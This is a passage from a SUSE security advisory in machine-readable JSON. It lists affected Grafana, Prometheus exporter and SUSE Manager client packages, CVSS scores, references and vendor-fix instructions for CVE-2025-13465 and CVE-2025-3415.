"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-13465",
"url": "https://www.suse.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "SUSE Bug 1257321 for CVE-2025-13465",
"url": "https://bugzilla.suse.com/1257321"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "important"
}
],
"title": "CVE-2025-13465"
},
{
"cve": "CVE-2025-3415",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-3415"
}
],
"notes": [
{
"category": "general",
"text": "Grafana is an open-source platform for monitoring and observability. The Grafana Alerting DingDing integration was not properly protected and could be exposed to users with Viewer permission. \nFixed in versions 10.4.19+security-01, 11.2.10+security-01, 11.3.7+security-01, 11.4.5+security-01, 11.5.5+security-01, 11.6.2+security-01 and 12.0.1+security-01",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-3415",
"url": "https://www.suse.com/security/cve/CVE-2025-3415"
},
{
"category": "external",
"summary": "SUSE Bug 1245302 for CVE-2025-3415",
"url": "https://bugzilla.suse.com/1245302"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
